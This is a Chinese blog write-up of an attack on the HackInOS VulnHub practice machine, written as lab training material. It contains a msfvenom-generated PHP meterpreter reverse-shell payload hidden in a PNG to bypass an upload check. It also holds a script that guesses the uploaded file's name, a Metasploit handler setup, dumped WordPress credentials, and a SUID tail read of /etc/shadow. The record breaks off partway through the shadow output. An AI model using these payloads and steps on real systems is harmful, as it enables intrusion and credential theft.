<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>HackInOS | sir</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="是我看不破红尘 还是要玉石俱焚是我解不开心门 还是造化爱弄人">
<meta name="keywords" content="渗透">
<meta property="og:type" content="article">
<meta property="og:title" content="HackInOS">
<meta property="og:url" content="https://cc-sir.github.io/2019/07/12/hackinos/index.html">
<meta property="og:site_name" content="sir">
<meta property="og:description" content="是我看不破红尘 还是要玉石俱焚是我解不开心门 还是造化爱弄人">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos2.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos3.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos4.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos5.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos6.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos7.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos8.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos9.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos10.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos11.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos12.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos13.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos14.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos15.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos16.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos17.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos18.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos19.png">
<meta property="og:image" content="https://cc-sir.github.io/photos/Hackinos1.png">
<meta property="og:updated_time" content="2019-07-12T14:20:23.466Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="HackInOS">
<meta name="twitter:description" content="是我看不破红尘 还是要玉石俱焚是我解不开心门 还是造化爱弄人">
<meta name="twitter:image" content="https://cc-sir.github.io/photos/Hackinos2.png">
  
    <link rel="alternative" href="/atom.xml" title="sir" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
      <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet">
  <script>
      var yiliaConfig = {
          rootUrl: '/',
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            
            <img lazy-src="/img/touxiang.png" class="js-avatar">
            
        </a>

        <hgroup>
          <h1 class="header-author"><a href="/" title="Hi Mate">钞sir</a></h1>
        </hgroup>

        
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">博客首页</a></li>
                        
                            <li><a href="/archives">所有文章</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl mail" target="_blank" href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=1787684615@qq.com" title="mail">mail</a>
                            
                                <a class="fl github" target="_blank" href="https://github.com/cc-sir" title="github">github</a>
                            
                                <a class="fl QQ" target="_blank" href="tencent://QQInterLive/?Cmd=2&Uin=1787684615" title="QQ">QQ</a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/Android/" style="font-size: 10px;">-Android</a> <a href="/tags/Windows/" style="font-size: 10px;">-Windows</a> <a href="/tags/pwn-堆/" style="font-size: 10px;">-pwn-堆</a> <a href="/tags/writeup/" style="font-size: 13.33px;">-writeup</a> <a href="/tags/Linux-kernel/" style="font-size: 20px;">Linux-kernel</a> <a href="/tags/pwn-Fmtstr/" style="font-size: 10px;">pwn-Fmtstr</a> <a href="/tags/pwn-堆/" style="font-size: 16.67px;">pwn-堆</a> <a href="/tags/pwn-栈/" style="font-size: 20px;">pwn-栈</a> <a href="/tags/writeup/" style="font-size: 20px;">writeup</a> <a href="/tags/渗透/" style="font-size: 10px;">渗透</a>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://ThunderJie.github.io/">ThunderJie</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://optimic.github.io/">观樂。</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">我已无力接住你，再也不能抗风雨</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="Me">钞sir</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/touxiang.png" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="Me">钞sir</a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">博客首页</a></li>
                
                    <li><a href="/archives">所有文章</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="mail" target="_blank" href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=1787684615@qq.com" title="mail">mail</a>
                    
                        <a class="github" target="_blank" href="https://github.com/cc-sir" title="github">github</a>
                    
                        <a class="QQ" target="_blank" href="tencent://QQInterLive/?Cmd=2&Uin=1787684615" title="QQ">QQ</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-hackinos" class="article article-type-post" itemscope="" itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2019/07/12/hackinos/" class="article-date">
      <time datetime="2019-07-12T14:20:43.304Z" itemprop="datePublished">2019-07-12</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      HackInOS
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/渗透/">渗透</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>是我看不破红尘 还是要玉石俱焚<br>是我解不开心门 还是造化爱弄人<br><a id="more"></a></p>
<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>HackinOS是一个渗透靶机，模拟真实的渗透环境，方便我们练习渗透方法，靶机下载<a href="https://www.vulnhub.com/entry/hackinos-1,295/#download" target="_blank" rel="noopener">地址</a>…<br>攻击者：kali<br>受害者：HackInOS</p>
<h1 id="渗透步骤"><a href="#渗透步骤" class="headerlink" title="渗透步骤"></a>渗透步骤</h1><p>##1.获取目标机器ip<br>因为我的靶机在虚拟机中网络用的NAT模式，所以靶机IP肯定和kali在同一个网络下，先利用nmap来扫描一波：<br><img src="https://cc-sir.github.io/photos/Hackinos2.png" alt="Find_ip1"><br><img src="https://cc-sir.github.io/photos/Hackinos3.png" alt="Find_ip2"><br>很明显，我们找到了目标机器的ip：192.168.88.133，并且发现开启了22和8000端口，在8000端口下面是一个http服务，而且有一个upload.php文件，猜测这里有一个上传文件漏洞….</p>
<h2 id="2-利用文件上传漏洞"><a href="#2-利用文件上传漏洞" class="headerlink" title="2.利用文件上传漏洞"></a>2.利用文件上传漏洞</h2><p>访问这个地址，确实发现有文件上传的功能：<br><img src="https://cc-sir.github.io/photos/Hackinos4.png" alt="file_upload"><br>然后我们右键查看源码，发现了一个hint：<br><img src="https://cc-sir.github.io/photos/Hackinos5.png" alt="hint"><br>给了我们一个guthub的<a href="https://github.com/fatihhcelik/Vulnerable-Machine---Hint" target="_blank" rel="noopener">连接</a>，我们访问发现：<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE html&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">align</span>=<span class="string">"center"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">""</span> <span class="attr">method</span>=<span class="string">"post"</span> <span class="attr">enctype</span>=<span class="string">"multipart/form-data"</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">b</span>&gt;</span>Select image : <span class="tag">&lt;/<span class="name">b</span>&gt;</span> </span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"file"</span> <span class="attr">name</span>=<span class="string">"file"</span> <span class="attr">id</span>=<span class="string">"file"</span> <span class="attr">style</span>=<span class="string">"border: solid;"</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">value</span>=<span class="string">"Submit"</span> <span class="attr">name</span>=<span class="string">"submit"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">&lt;?php</span><br><span class="line">// Check if image file is a actual image or fake image</span><br><span class="line">if(isset($_POST["submit"])) &#123;</span><br><span class="line">	$rand_number = rand(1,100);</span><br><span class="line">	$target_dir = "uploads/";</span><br><span class="line">	$target_file = $target_dir . md5(basename($_FILES["file"]["name"].$rand_number));</span><br><span class="line">	$file_name = $target_dir . basename($_FILES["file"]["name"]);</span><br><span class="line">	$uploadOk = 1;</span><br><span class="line">	$imageFileType = strtolower(pathinfo($file_name,PATHINFO_EXTENSION));</span><br><span class="line">	$type = $_FILES["file"]["type"];</span><br><span class="line">	$check = getimagesize($_FILES["file"]["tmp_name"]);</span><br><span class="line">	if($check["mime"] == "image/png" || $check["mime"] == "image/gif")&#123;</span><br><span class="line">		$uploadOk = 1;</span><br><span class="line">	&#125;else&#123;</span><br><span class="line">		$uploadOk = 0;</span><br><span class="line">		echo ":)";</span><br><span class="line">	&#125; </span><br><span class="line">  if($uploadOk == 1)&#123;</span><br><span class="line">      move_uploaded_file($_FILES["file"]["tmp_name"], $target_file.".".$imageFileType);</span><br><span class="line">      echo "File uploaded /uploads/?";</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>给了我们上传文件的源码，通过审查我们发现，只允许上传PNG或GIF格式的图片，校验方式是校验文件内容（实际校验的是文件开头几个标志文件类型的字节，PNG格式为0x890x500x4E0x470x0D0x0A0x1A0x0A，GIF格式为GIF98)，没有校验文件后缀;然后通过校验的文件会保存在uploads目录中，但是文件名是一个随机生成的md5值，而后缀保持上传文件的后缀不变….<br>所以我们可以先做一个图片马，主要是反弹shell的马,我们利用Metasploit来生成：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.88.130 lport=4444 -f raw</span><br></pre></td></tr></table></figure></p>
<p><img src="https://cc-sir.github.io/photos/Hackinos6.png" alt="msfvenom"><br>把生成的payload：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*&lt;?php /**/</span> error_reporting(<span class="number">0</span>); $ip = <span class="string">'192.168.88.130'</span>; $port = <span class="number">4444</span>; <span class="keyword">if</span> (($f = <span class="string">'stream_socket_client'</span>) &amp;&amp; is_callable($f)) &#123; $s = $f(<span class="string">"tcp://&#123;$ip&#125;:&#123;$port&#125;"</span>); $s_type = <span class="string">'stream'</span>; &#125; <span class="keyword">if</span> (!$s &amp;&amp; ($f = <span class="string">'fsockopen'</span>) &amp;&amp; is_callable($f)) &#123; $s = $f($ip, $port); $s_type = <span class="string">'stream'</span>; &#125; <span class="keyword">if</span> (!$s &amp;&amp; ($f = <span class="string">'socket_create'</span>) &amp;&amp; is_callable($f)) &#123; $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); <span class="keyword">if</span> (!$res) &#123; <span class="keyword">die</span>(); &#125; $s_type = <span class="string">'socket'</span>; &#125; <span class="keyword">if</span> (!$s_type) &#123; <span class="keyword">die</span>(<span class="string">'no socket funcs'</span>); &#125; <span class="keyword">if</span> (!$s) &#123; <span class="keyword">die</span>(<span class="string">'no socket'</span>); &#125; <span class="keyword">switch</span> ($s_type) &#123; <span class="keyword">case</span> <span class="string">'stream'</span>: $len = fread($s, <span class="number">4</span>); <span class="keyword">break</span>; <span class="keyword">case</span> <span class="string">'socket'</span>: $len = socket_read($s, <span class="number">4</span>); <span class="keyword">break</span>; &#125; <span class="keyword">if</span> (!$len) &#123; <span class="keyword">die</span>(); &#125; $a = unpack(<span class="string">"Nlen"</span>, $len); $len = $a[<span class="string">'len'</span>]; $b = <span class="string">''</span>; <span class="keyword">while</span> (strlen($b) &lt; $len) &#123; <span class="keyword">switch</span> ($s_type) &#123; <span class="keyword">case</span> <span class="string">'stream'</span>: $b .= fread($s, $len-strlen($b)); <span class="keyword">break</span>; <span class="keyword">case</span> <span class="string">'socket'</span>: $b .= socket_read($s, $len-strlen($b)); <span class="keyword">break</span>; &#125; &#125; $GLOBALS[<span class="string">'msgsock'</span>] = $s; $GLOBALS[<span class="string">'msgsock_type'</span>] = $s_type; <span class="keyword">if</span> (extension_loaded(<span class="string">'suhosin'</span>) &amp;&amp; ini_get(<span class="string">'suhosin.executor.disable_eval'</span>)) &#123; $suhosin_bypass=create_function(<span class="string">''</span>, $b); $suhosin_bypass(); &#125; <span class="keyword">else</span> &#123; <span class="keyword">eval</span>($b); &#125; <span class="keyword">die</span>();</span><br></pre></td></tr></table></figure></p>
<p>保存在hack.php中，然后随便找一个png图片，将hack.php添加到图片中去,然后将png图片后缀改为php：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat hack.php &gt;&gt; best.png</span><br><span class="line">mv best.png sir.php</span><br></pre></td></tr></table></figure></p>
<p>然后我们可以写一个python脚本来帮助我们找到并访问我们上传的木马：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">101</span>):</span><br><span class="line">    file_name = hashlib.md5(<span class="string">'sir.php'</span>+str(i)).hexdigest()</span><br><span class="line">    r = requests.get(<span class="string">'http://192.168.88.133:8000/uploads/&#123;&#125;.php'</span>.format(file_name))</span><br></pre></td></tr></table></figure></p>
<p>然后我们设置好我们的msfconsole，等待反弹shell的连接：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/multi/handler</span><br><span class="line">msf5 exploit(multi/handler) &gt; <span class="built_in">set</span> payload php/meterpreter/reverse_tcp</span><br><span class="line">payload =&gt; php/meterpreter/reverse_tcp</span><br><span class="line">msf5 exploit(multi/handler) &gt; <span class="built_in">set</span> lhost 192.168.88.130</span><br><span class="line">lhost =&gt; 192.168.88.130</span><br><span class="line">msf5 exploit(multi/handler) &gt; exploit</span><br></pre></td></tr></table></figure></p>
<p><img src="https://cc-sir.github.io/photos/Hackinos7.png" alt="msfconsole"><br>然后我们就可以去网站上去上传木马，然后运行python脚本，然后看到我们已经获得了一个shell：<br><img src="https://cc-sir.github.io/photos/Hackinos8.png" alt="shell"><br>但是我们的权限很低…..</p>
<h2 id="提权1"><a href="#提权1" class="headerlink" title="提权1"></a>提权1</h2><p>我们在Web目录中找到Wordpress的配置文件wp-config.php，看到了数据库连接信息：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * The base configuration for WordPress</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The wp-config.php creation script uses this file during the</span></span><br><span class="line"><span class="comment"> * installation. You don't have to use the web site, you can</span></span><br><span class="line"><span class="comment"> * copy this file to "wp-config.php" and fill in the values.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * This file contains the following configurations:</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * * MySQL settings</span></span><br><span class="line"><span class="comment"> * * Secret keys</span></span><br><span class="line"><span class="comment"> * * Database table prefix</span></span><br><span class="line"><span class="comment"> * * ABSPATH</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@link</span> https://codex.wordpress.org/Editing_wp-config.php</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@package</span> WordPress</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// ** MySQL settings - You can get this info from your web host ** //</span></span><br><span class="line"><span class="comment">/** The name of the database for WordPress */</span></span><br><span class="line">define(<span class="string">'DB_NAME'</span>, <span class="string">'wordpress'</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">/** MySQL database username */</span></span><br><span class="line">define(<span class="string">'DB_USER'</span>, <span class="string">'wordpress'</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">/** MySQL database password */</span></span><br><span class="line">define(<span class="string">'DB_PASSWORD'</span>, <span class="string">'wordpress'</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">/** MySQL hostname */</span></span><br><span class="line">define(<span class="string">'DB_HOST'</span>, <span class="string">'db:3306'</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">/** Database Charset to use in creating database tables. */</span></span><br><span class="line">define(<span class="string">'DB_CHARSET'</span>, <span class="string">'utf8'</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">/** The Database Collate type. Don't change this if in doubt. */</span></span><br><span class="line">define(<span class="string">'DB_COLLATE'</span>, <span class="string">''</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">/**#@+</span></span><br><span class="line"><span class="comment"> * Authentication Unique Keys and Salts.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Change these to different unique phrases!</span></span><br><span class="line"><span class="comment"> * You can generate these using the &#123;<span class="doctag">@link</span> https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service&#125;</span></span><br><span class="line"><span class="comment"> * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@since</span> 2.6.0</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line">define(<span class="string">'AUTH_KEY'</span>,         <span class="string">'b68c5e8cad4c8f8367efe2db89d7865e894d037d'</span>);</span><br><span class="line">define(<span class="string">'SECURE_AUTH_KEY'</span>,  <span class="string">'a7b32014b1898077ebe554d7284482aebeac92ae'</span>);</span><br><span class="line">define(<span class="string">'LOGGED_IN_KEY'</span>,    <span class="string">'e8b6f6b9b86e78127b8bfce51ed90151335d0140'</span>);</span><br><span class="line">define(<span class="string">'NONCE_KEY'</span>,        <span class="string">'39f17a336c6000ca5d7929be883be09131dc31e1'</span>);</span><br><span class="line">define(<span class="string">'AUTH_SALT'</span>,        <span class="string">'dbf7b92510a931b835a8b82eec8fd1adbaad487f'</span>);</span><br><span class="line">define(<span class="string">'SECURE_AUTH_SALT'</span>, <span class="string">'632f4f59a75363a72b7b526d8b69718fc89a5c07'</span>);</span><br><span class="line">define(<span class="string">'LOGGED_IN_SALT'</span>,   <span class="string">'614056ec3ba0011dcdb83422b44238045627750e'</span>);</span><br><span class="line">define(<span class="string">'NONCE_SALT'</span>,       <span class="string">'48e539381259ccc664202943d14359572f23638b'</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">/**#@-*/</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * WordPress Database Table prefix.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * You can have multiple installations in one database if you give each</span></span><br><span class="line"><span class="comment"> * a unique prefix. Only numbers, letters, and underscores please!</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line">$table_prefix  = <span class="string">'wp_'</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * For developers: WordPress debugging mode.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Change this to true to enable the display of notices during development.</span></span><br><span class="line"><span class="comment"> * It is strongly recommended that plugin and theme developers use WP_DEBUG</span></span><br><span class="line"><span class="comment"> * in their development environments.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * For information on other constants that can be used for debugging,</span></span><br><span class="line"><span class="comment"> * visit the Codex.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@link</span> https://codex.wordpress.org/Debugging_in_WordPress</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line">define(<span class="string">'WP_DEBUG'</span>, <span class="keyword">false</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// If we're behind a proxy server and using HTTPS, we need to alert Wordpress of that fact</span></span><br><span class="line"><span class="comment">// see also http://codex.wordpress.org/Administration_Over_SSL#Using_a_Reverse_Proxy</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_SERVER[<span class="string">'HTTP_X_FORWARDED_PROTO'</span>]) &amp;&amp; $_SERVER[<span class="string">'HTTP_X_FORWARDED_PROTO'</span>] === <span class="string">'https'</span>) &#123;</span><br><span class="line">	$_SERVER[<span class="string">'HTTPS'</span>] = <span class="string">'on'</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* That's all, stop editing! Happy blogging. */</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/** Absolute path to the WordPress directory. */</span></span><br><span class="line"><span class="keyword">if</span> ( !defined(<span class="string">'ABSPATH'</span>) )</span><br><span class="line">	define(<span class="string">'ABSPATH'</span>, dirname(<span class="keyword">__FILE__</span>) . <span class="string">'/'</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">/** Sets up WordPress vars and included files. */</span></span><br><span class="line"><span class="keyword">require_once</span>(ABSPATH . <span class="string">'wp-settings.php'</span>);</span><br></pre></td></tr></table></figure></p>
<p>然后我们上传一个Linux提权信息收集脚本linuxprivchecker. py：<br><img src="https://cc-sir.github.io/photos/Hackinos9.png" alt="upload_linuxprivchecker.py"><br>然后运行这个脚本：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; chmod 744 /tmp/linuxprivchecker.py</span><br><span class="line">meterpreter &gt; shell</span><br><span class="line">Process 141 created.</span><br><span class="line">Channel 10 created.</span><br><span class="line">python /tmp/linuxprivchecker.py</span><br></pre></td></tr></table></figure></p>
<p><img src="https://cc-sir.github.io/photos/Hackinos10.png" alt="run_py"><br>仔细阅读脚本输出的内容，我们发现到tail被设置了SUID：<br><img src="https://cc-sir.github.io/photos/Hackinos11.png" alt="tail"><br>直接用tail读取shadow文件：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; shell</span><br><span class="line">Process 344 created.</span><br><span class="line">Channel 3 created.</span><br><span class="line">tail -c1G /etc/shadow</span><br><span class="line">root:<span class="variable">$6</span><span 